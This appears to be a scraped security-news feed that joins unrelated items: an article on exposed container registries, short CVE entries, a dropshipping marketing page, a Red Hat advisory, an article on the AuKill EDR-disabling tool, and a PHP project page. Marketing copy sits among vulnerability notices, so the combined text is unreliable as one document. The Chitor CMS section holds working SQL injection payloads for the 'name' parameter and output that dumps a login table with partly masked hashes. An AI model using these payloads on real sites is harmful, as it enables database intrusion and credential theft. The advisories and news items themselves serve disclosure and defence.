Researchers find 250 million artifacts and 65,000 container images exposed in registries and repositories scattered across the Internet.

Many organizations, including some of the world's largest companies, are at heightened risk of compromise and data theft from misconfigured and poorly secured software registries and artifact repositories, a new study has shown.

Research that cloud-security vendor Aqua Security recently conducted uncovered some 250 million software artifacts and more than 65,000 container images lying exposed and Internet-accessible in thousands of registries and repositories. Some 1,400 hosts allowed access to secrets, keys, passwords, and other sensitive data that an attacker could use to mount a supply chain attack, or to poison an enterprise software development environment.

**Wide Registry Exposure**

Aqua discovered 57 registries with critical misconfigurations, including 15 that enabled an attacker to gain admin privileges with just the default password; 2,100 artifact registries offered upload permissions, which potentially gave anonymous users a way to upload malicious code to the registry.

In all, Aqua found nearly 12,800 container image registries that were accessible over the Internet of which 2,839 permitted anonymous user access. On 1,400 hosts, Aqua researchers found at least one sensitive data element such as keys, tokens, and credentials; on 156 hosts the company found private addresses of endpoints such as MongoDB, Redis, and PostgreSQL.

Among the thousands of affected organizations were several Fortune 500 companies. One of them was IBM, which had exposed an internal container registry to the Internet and put sensitive data at risk of access. The company addressed the issue after Aqua's researchers informed it of their discovery. Other notable organizations that had potentially put their data at similar risk included Siemens, Cisco, and Alibaba. In addition, Aqua found software secrets in registries belonging to at least two cybersecurity firms exposed to the Internet. Aqua's data is based on an analysis of container images, Red Hat Quay container registries, JFrog Artifactory, and Sonatype Nexus artifact registries.

"It's critical that organizations of all sizes around the world take a moment to verify that their registries — whether public or private — are secure," advises Assaf Morag, lead threat intelligence and data analyst at Aqua Security. Organizations that have code in public registries or have connected their registries to the Internet and allow anonymous access should ensure their code and registries don't contain secrets, intellectual property, or sensitive information, he says.

"The hosts belonged to thousands of organizations around the world – ranging by industry, size, and geography," Morag notes. "That means the benefits for an attacker could also range."

**Risky Registries & Repositories**

Aqua's research is the latest to highlight the risks to businesses from data in software registries, repositories and artifact management systems. Development teams use software registries to store, manage, and distribute software, libraries, and tools and use repositories for centrally storing and maintaining specific software packages from within the registry. The function of artifact repositories is to help organizations store and manage the artifacts of a software project such as source code, binary files, documentation, and build artifacts. Artifact management systems can also include Docker images and packages from public repositories such as Maven, NPM, and NuGet.

Often, organizations using open source code in their projects — an almost ubiquitous practice at this point —connect their internal registries and artifact management systems to the Internet and allow anonymous access to certain portions of the registry. For instance, a software development team using JFrog Artifactory as an internal repository could configure external access so customers and partners can share its artifacts.

Threat actors seeking to compromise enterprise software development environments have increasingly begun targeting software registries and repositories in recent years. Some of the attacks have involved attempts by threat actors to introduce malicious code into development and build environments directly or via poisoned packages planted on NPM, PyPI, and other widely used public repositories. In other instances, threat actors have targeted these tools to gain access to the sensitive information such as credentials, passwords, and APIs stored in them.

Aqua's research showed that, in many cases, organizations are inadvertently making it easier for attackers to carry out these attacks by mistakenly connecting registries containing sensitive information to the Internet, posting secrets in public repositories, using default passwords for access control, and granting overly excessive privileges to users.

In one instance, Aqua uncovered a bank with an open registry featuring online banking applications. "An attacker could have pulled the container, then modified it and pushed it back," Morag says.

In another instance, Aqua discovered two misconfigured container registries belonging to the development and engineering team of a Fortune 100 technology company. Aqua found the registries to contain so much sensitive information and afford so much access and privileges for doing damage, that the company decided to halt its research and inform the technology company of the issue. In this case, the security snafu resulted from a development engineer opening up the environment while working on an unapproved side project.

Millions of Artifacts, Misconfigured Enterprise Software Registries Are Ripe for Pwning

The Steveas WP Live Chat Shoutbox WordPress plugin through 1.4.2 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.

CVE-2023-1020

The Random Text WordPress plugin through 0.3.0 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by any authenticated users, such as subscribers.

CVE-2023-0388

SQL injection vulnerability found in PrestaShop bdroppy v.2.2.12 and before allowing a remote attacker to gain privileges via the BdroppyCronModuleFrontController::importProducts component.

The **BDroppy dropshipping service** allows you to connect our catalog of designer fashion products to your online store or to the best marketplaces, without any stock risk and without having to deal with shipments.

Sell the best fashion products with no minimum order quantity.  
Start your dropshipping business: choose your channel now!

**Our integrations**

**Woocommerce Dropshipping**

**Selling in dropshipping with Woocommerce** is a pretty simple procedure. Once you have created your e-commerce, you should select the dropshipping service provider and look for a plugin to include and synchronize its products. Thanks to BDroppy, you can have your site configured with our fashion catalog integrated. Through the plugin, all data (products, prices and orders) will be automatically synchronized.  
Find out more

**Shopify Dropshipping**

Shopify is definitely one of the most used online sales platforms: **creating a store with Shopify** is very simple and this means that it is used a lot all over the world. Would you like to sell the best fashion products on your Shopify store without big investments?**Use our app to sell fashion on Shopify in dropshipping**, in just a few steps, and our catalog will be uploaded to your online store. Find out more

**Prestashop Dropshipping**

Prestashop is a **free e-commerce platform** for online sales that helps small and large businesses create online stores in a simple way and without sales commissions. If you want a **multi-language and multi-currency shop** with a large integrated fashion catalog choose your dropshipping plan with BDroppy now: we will take care of shipments worldwide and you will manage your sales from a simple dashboard!

**Squarespace Dropshipping**

Squarespace is a **paid site builder**. By subscribing you gain access to a wide range of tools that you can use to design your site, without the need for coding skills or Web development. Do you want to **connect BDroppy to your Squarespace store** and sell designer products in dropshipping? No problem, the integration is now available!

**Ecwid Dropshipping**

Dropshipping with Ecwid is easy! Ecwid is **a platform that allows you to create your e-commerce** with your products in as many marketplaces as possible and allows you to create your online showcase and incorporate it to other platforms. Combine Ecwid with the BDroppy catalog, and start selling designer fashion **without worrying about shipping** and **without having to anticipate the purchase of the goods**! Connect your Ecwid shop with the BDroppy catalog.  
Find out more

**Wix Dropshipping**

If you have created your ecommerce site with WIX, you can easily integrate it with the BDroppy catalog. Thanks to our plugin, you can enrich your shop with thousands of designer fashion products, and the orders and **available products will be automatically synchronized.** **You won’t have any stock risks and we’ll take care of the shipments.** Manage your catalog from the dashboard and start selling the most requested products right away!

**EKM dropshipping**

Discover how easy it is to sell online thanks to EKM! EKM is a site builder that allows you to design your site and customize it according to your needs.

If you want to connect BDroppy to your EKM store to **sell in dropshipping** without worrying about the warehouse or shipping, no problem: the integration is now available!

**Ebay Dropshipping**

eBay is a marketplace offering its users the opportunity **to sell and buy both new and used objects**, in different ways, including sales at a fixed price and at a dynamic price, commonly defined as «online auctions». **How to sell on eBay without stock risks**? With BDroppy you can sell our fashion catalog online on eBay and make money thanks to our dropshipping service: you will buy our products at a wholesale price and resell them at the best price to your customers on your eBay virtual shop. Find out more

**Amazon Dropshipping**

Amazon is definitely the most important marketplace in the world, with a wide range of products and categories for sale, so much so that it can be considered essentially a search engine for shopping. **Do you want to sell the most popular products on Amazon?** You can integrate the **BDroppy fashion catalog**into your Amazon store, with the dropshipping service included, to resell thousands of original designer fashion products online, using a single control panel. Find out more

**What are you waiting for?**

You can **integrate the BDroppy catalog of great fashion brands with one or more sales channels** choosing from the main marketplaces, your existing e-commerce, or if you want, we can create for you a turnkey website with our catalog already included!

CVE-2023-26865: Dropshipping apps available integrations with BDroppy - BDroppy

Bang Resto 1.0 was discovered to contain multiple SQL injection vulnerabilities via the btnMenuItemID, itemID, itemPrice, menuID, staffID, or itemqty parameter.

CVE-2023-29849

Red Hat Security Advisory 2023-1816-01 - Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Data Foundation. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Red Hat OpenShift Data Foundation 4.12.2 Bug Fix and security update  
Advisory ID:       RHSA-2023:1816-01  
Product:           RHODF  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1816  
Issue date:        2023-04-17  
CVE Names:         CVE-2020-10735 CVE-2021-28861 CVE-2022-4304   
                   CVE-2022-4415 CVE-2022-4450 CVE-2022-40897   
                   CVE-2022-41717 CVE-2022-45061 CVE-2022-48303   
                   CVE-2023-0215 CVE-2023-0286 CVE-2023-23916   
=====================================================================

1. Summary:

Updated images that fix several bugs are now available for Red Hat  
OpenShift Data Foundation 4.12.2 on Red Hat Enterprise Linux 8 from Red Hat  
Container Registry.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Data Foundation is software-defined storage integrated  
with and optimized for the Red Hat OpenShift Data Foundation. Red Hat  
OpenShift Data Foundation is a highly scalable, production-grade persistent  
storage for stateful applications running in the Red Hat OpenShift  
Container Platform. In addition to persistent storage, Red Hat OpenShift  
Data Foundation provisions a multicloud data management service with an S3  
compatible API.

Security Fix(es):

* golang: net/http: An attacker can cause excessive memory growth in a Go  
server accepting HTTP/2 requests (CVE-2022-41717)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* [backport 4.12] s3 sync directory to a bucket fails with Internal Error  
in between the upload operation (BZ#2170416)

* [4.12 clone] [Noobaa] Secrets are used in env variables (BZ#2171968)

* [Backport to 4.12.z] Placeholder bug to backport the odf changes for  
Managed services epic RHSTOR-2442  to 4.12.z (BZ#2174335)

* [ODF 4.12] Missing the status-reporter binary causing pods  
"report-status-to-provider" remain in CreateContainerError on ODF to ODF  
cluster on ROSA (BZ#2179978)

* [MDR] After upgrade(redhat-operators) on hub from 4.12.1 to 4.12.2  
noticed 2 token-exchange-agent pods on managed clusters and one of them on  
CBLO (BZ#2183198)

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests  
2171968 - [4.12 clone] [Noobaa] Secrets are used in env variables  
2174335 - [Backport to 4.12.z] Placeholder bug to backport the odf changes for Managed services epic RHSTOR-2442  to 4.12.z  
2175365 - [4.12.z] Upgrade from 4.12.0 to 4.12.1 doesn't work  
2179978 - [ODF 4.12] Missing the status-reporter binary causing pods "report-status-to-provider" remain in CreateContainerError on ODF to ODF cluster on ROSA  
2183198 - [MDR] After upgrade(redhat-operators) on hub from 4.12.1 to 4.12.2 noticed 2 token-exchange-agent pods on managed clusters and one of them on CBLO  
2186455 - Include at ODF 4.12 container images the RHEL8 CVE fix on "openssl"

5. References:

https://access.redhat.com/security/cve/CVE-2020-10735  
https://access.redhat.com/security/cve/CVE-2021-28861  
https://access.redhat.com/security/cve/CVE-2022-4304  
https://access.redhat.com/security/cve/CVE-2022-4415  
https://access.redhat.com/security/cve/CVE-2022-4450  
https://access.redhat.com/security/cve/CVE-2022-40897  
https://access.redhat.com/security/cve/CVE-2022-41717  
https://access.redhat.com/security/cve/CVE-2022-45061  
https://access.redhat.com/security/cve/CVE-2022-48303  
https://access.redhat.com/security/cve/CVE-2023-0215  
https://access.redhat.com/security/cve/CVE-2023-0286  
https://access.redhat.com/security/cve/CVE-2023-23916  
https://access.redhat.com/security/updates/classification/#moderate

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEOpudzjgjWX9erEAQgudA//c1DhcceGIufqRhheeM1fMJLx1pr8aS5C  
fVkwxXyNVip1BZta1fwLstIPEcbNG1Q3xCnjVmDqjxkG4sPh7HdkzmtIVdt9JSBX  
3TKSqHUMtP7m1dtlP8xg2fyQ8Om7Ki9xE6KCkijR3TwDZMZOkFtRg6D9MbSPT7+s  
3tvq+vEQ2HVr13KEdMC7kSSyvZsqLgCT3LcURFxn/rZipGy+DDJeK8uGhMe2uF43  
QPsYBb0qhm2s6T+6QWhBPahOgDxqCtP8KSgO6RNuieubL/E+wr+sV8LBXkrPZ71N  
QT6MEY7R8x5Af7+04t0INnFg2Bqo+eJPLPgLGpTqFtJeoDm0HAeqliHgv7SFqex5  
FPArRIPPgzjjEFASv4dr1r4WKAr9PWaGCrFE4OZM2m5ibQi//SWJuEn1719T5WDf  
+BGCJ8UfOWOX3J385rECIm2r0ZL5yPq2XBoPJUEcA0I0YSswlOjD6V6ovaROSNrh  
NU2eA/xSj4vwDTEC+FojZAeL1IT7uAFUJCYMq+zcyqTFRE+C7tDo8zcnVuJVhHq2  
xhezfIlbgBbcEHr5omqVp4utqDSCfYfhoGFxUJtW07iEJmq01R9lPsNbdVQsAGW4  
8/Xt+P4wU6LIYNcAM4S5yxMy2KMN/rDKwoxSljg4I6dM8uWUJAF2iaGA1+T2dKq5  
GfmMJLVuC8A=  
=MYP7  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1816-01

Chitor CMS version 1.1.2 suffers from a remote SQL injection vulnerability. Original discovery of this finding is attributed to msd0pe in April of 2023.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://github.com/waqaskanju/Chitor-CMS                                   ││  Vendor   : Waqas Ahmad                                                                ││  Software : Chitor-CMS 1.1.2                                                           ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /detail_student.php/detail_student.php?name=[SQLI]&search=SearchGET parameter 'name' is vulnerable to SQLI---Parameter: name (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)    Payload: name=123' AND 7885=7885#&search=Search    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: name=123' AND (SELECT 9128 FROM(SELECT COUNT(*),CONCAT(0x71716b6271,(SELECT (ELT(9128=9128,1))),0x716a6b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- DaVE&search=Search    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: name=123' AND (SELECT 1784 FROM (SELECT(SLEEP(5)))AjPI)-- FsLQ&search=Search---GET parameter 'name' is vulnerable to SQLI[+] Starting the Attackfetching current databasecurrent database: ''**********_chitor_db'fetching tables for database: '**********_chitor_db'Database: **********_chitor_db[12 tables]+-----------------+| position        || class_subjects  || employees       || login           || marks           || school_classes  || schools         || setting         || students_info   || subject_teacher || subjects        || tab_index       |+-----------------+fetching columns for table 'login' in database '**********_chitor_db'Table: login[5 columns]+-------------+--------------+| Column      | Type         |+-------------+--------------+| Password    | varchar(256) || Status      | int(11)      || Employee_Id | int(11)      || Id          | int(11)      || User_Name   | varchar(30)  |+-------------+--------------+fetching entries of column(s) 'Employee_Id,Id,User_Name,`Password`,`Status`' for table 'login' in database '**********_chitor_db'Table: login[3 entries]+----+----------+------------------------------------------+-------------+------------+| Id | Status   | Password                                 | Employee_Id | User_Name  |+----+----------+------------------------------------------+-------------+------------+| 1  | 1        | *****1a7fdd83dd1e2a309ce759***** (****)  | 1           | Guest      || 2  | 1        | *****82fb3cee50d9272ba79822*****         | 2           | **qa*kan** || 3  | 1        | *****f297a57a5a743894a0e4a8***** (****)  | 3           | admin      |+----+----------+------------------------------------------+-------------+------------+[-] Done

Chitor CMS 1.1.2 SQL Injection

Threat actors are employing a previously undocumented "defense evasion tool" dubbed AuKill that's designed to disable endpoint detection and response (EDR) software by means of a Bring Your Own Vulnerable Driver (BYOVD) attack.
"The AuKill tool abuses an outdated version of the driver used by version 16.32 of the Microsoft utility, Process Explorer, to disable EDR processes before deploying

Endpoint Security / BYOVD

Threat actors are employing a previously undocumented "defense evasion tool" dubbed **AuKill** that's designed to disable endpoint detection and response (EDR) software by means of a Bring Your Own Vulnerable Driver (BYOVD) attack.

"The AuKill tool abuses an outdated version of the driver used by version 16.32 of the Microsoft utility, Process Explorer, to disable EDR processes before deploying either a backdoor or ransomware on the target system," Sophos researcher Andreas Klopsch said in a report published last week.

Incidents analyzed by the cybersecurity firm show the use of AuKill since the start of 2023 to deploy various ransomware strains such as Medusa Locker and LockBit. Six different versions of the malware have been identified to date. The oldest AuKill sample features a November 2022 compilation timestamp.

The BYOVD technique relies on threat actors misusing a legitimate, but out-of-date and exploitable, driver signed by Microsoft (or using a stolen or leaked certificate) to gain elevated privileges and turn off security mechanisms.

By using legitimate, exploitable drivers, the idea is to bypass a key Windows safeguard known as Driver Signature Enforcement that ensures kernel-mode drivers have been signed by a valid code signing authority before they are allowed to run.

"The AuKill tool requires administrative privileges to work, but it cannot give the attacker those privileges," Sophos researchers noted. "The threat actors using AuKill took advantage of existing privileges during the attacks, when they gained them through other means."

This is not the first time the Microsoft-signed Process Explorer driver has been weaponized in attacks. In November 2022, Sophos also detailed LockBit affiliates' use of an open source tool called Backstab that abused outdated versions of the driver to terminate protected anti-malware processes.

Then earlier this year, a malvertising campaign was spotted utilizing the same driver to distribute a .NET loader named MalVirt to deploy the FormBook information-stealing malware.

The development comes as the AhnLab Security Emergency response Center (ASEC) revealed that poorly managed MS-SQL servers are being weaponized to install the Trigona ransomware, which shares overlaps with another strain referred to as CryLock.

It also follows findings that the Play ransomware (aka PlayCrypt) actors have been observed using custom data harvesting tools that make it possible to enumerate all users and computers on a compromised network and copy files from the Volume Shadow Copy Service (VSS).

Grixba, a .NET-based information stealer, is designed to scan a machine for security programs, backup software, and remote administration tools, and exfiltrate the gathered data in the form of CSV files that are then compressed into ZIP archives.

Also used by the cybercriminal gang, tracked by Symantec as Balloonfly, is a VSS Copying Tool written in .NET that makes use of the AlphaVSS framework to list files and folders in a VSS snapshot and copy them to a destination directory prior to encryption.

UPCOMING WEBINAR

Zero Trust + Deception: Learn How to Outsmart Attackers!

Discover how Deception can detect advanced threats, stop lateral movement, and enhance your Zero Trust strategy. Join our insightful webinar!

Save My Seat!

Play ransomware is notable for not only utilizing intermittent encryption to speed up the process, but also for the fact that it's not operated on a ransomware-as-a-service (RaaS) model. Evidence gathered so far points to Balloonfly carrying out the ransomware attacks as well as developing the malware themselves.

Grixba and VSS Copying Tool are the latest in a long list of proprietary tools such as Exmatter, Exbyte, and PowerShell-based scripts that are used by ransomware actors to establish more control over their operations, while also adding extra layers of complexity to persist in compromised environments and evade detection.

Another technique increasingly adopted by financially-motivated groups is the use of the Go programming language to develop cross-platform malware and resist analysis and reverse engineering efforts.

Indeed, a report from Cyble last week documented a new GoLang ransomware called CrossLock that employs the double-extortion technique to increase the likelihood of payment from its victims, alongside taking steps to sidestep event tracing for Windows (ETW).

"This functionality can enable the malware to avoid detection by security systems that depend on event logs," Cyble said. "CrossLock Ransomware also performs several actions to reduce the chances of data recovery while simultaneously increasing the attack's effectiveness."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Ransomware Hackers Using AuKill Tool to Disable EDR Software Using BYOVD Attack

A username enumeration issue was discovered in Medicine Tracker System 1.0. The login functionality allows a malicious user to guess a valid username due to a different response time from invalid usernames. When one enters a valid username, the response time increases depending on the length of the supplied password.

Submitted by oretnom23 on Wednesday, March 15, 2023 - 14:32.

This simple project is entitled **Medicine Tracker System**. It is a web-based application that was developed using **PHP** and **MySQL Database**. The project allows the users to keep notes about their daily medication to easily track it. It has a simple and pleasant user interface with the help of a **Material-Kit** template. It consists of multiple user-friendly features and functionalities.

****How does the Medicine Traker System work?****

The **Medicine Tracker System** is a sort of scheduling and note web application that can store the schedule of medicines of multiple users. Here, users can simply register for the application and manage their daily medication schedule. The system list all the medicine that the user need to take on the current date and at a specific time.

The system was mainly developed to provide students and beginners with a reference or source code to start with for building a wide-scope **Medicine Tracker System** or **web application**.

****Features and Functionalities****

Here are the features and functionalities of this **Medicine Tracker System**:

*   **Website Portal**
    *   **Home Content**
    *   **About Us Content**
*   **Login and Registration**
*   **Dashboard**
    *   **List of Today's Scheduled Medicine**
*   **Medicine Management**
*   **Medicine Schedule Management**
*   **Manage Account Details**
*   **Logout**

****What are the Technologies used?****

I used the following technologies for building this simple **Medicine Tracker System**:

*   **XAMPP**
*   **VS CODE**
*   **PHP**
*   **MySQL Database**
*   **HTML**
*   **CSS**
*   **JS**
*   **jQuery**
*   **Ajax**
*   **Material-Kit Template**
*   **Material-UI Icon**

****Snapshots****

Here are some of the project's pages and content snapshots.

****Portal Page****

****Login Form****

****Registration Form****

****Dashboard Content****

****Medicine List Page****

****Schedule Medicine Details****

The **Medicine Tracker System** project source code zip file is provided on this website and it is free to download. Feel free to download and modify the source code the way you wanted. The download button is located below this article's content.

****How to Run?****

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)

****System Installation/Setup****

1.  **Open** your **XAMPP Control Panel** and start ****Apache**** and ****MySQL****.
2.  **Extract** the **downloaded source code **zip** file**.
3.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
4.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
5.  **Create** a **new database** named ****mts\_db****.
6.  **Import** the provided ****SQL**** file. The file is known as ****mts\_db.sql**** located inside the **database** folder.
7.  **Browse** the **Medicine Tracker System** in a **browser**. i.e. ****http://localhost/php-mts/****.

****Sample User Access****

Username: **mcooper**  
Password: **mcooper123**

****DEMO VIDEO****

That's it! I hope this **Medicine Tracker System in PHP (OOP) and MySQL DB Source Code** will help you with what you are looking for and that you'll find something useful for your current and future PHP Projects.

Explore more on this website for more **Tutorials** and **Free Source Codes**.

**Enjoy =)**

*   2334 views

CVE-2023-30458: Medicine Tracker System in PHP (OOP) and MySQL DB Source Code Free Download

The 'Visforms Base Package for Joomla 3' extension is vulnerable to SQL Injection as concatenation is used to construct an SQL Query. An attacker can interact with the database and could be able to read, modify and delete data on it.

Tag

#sql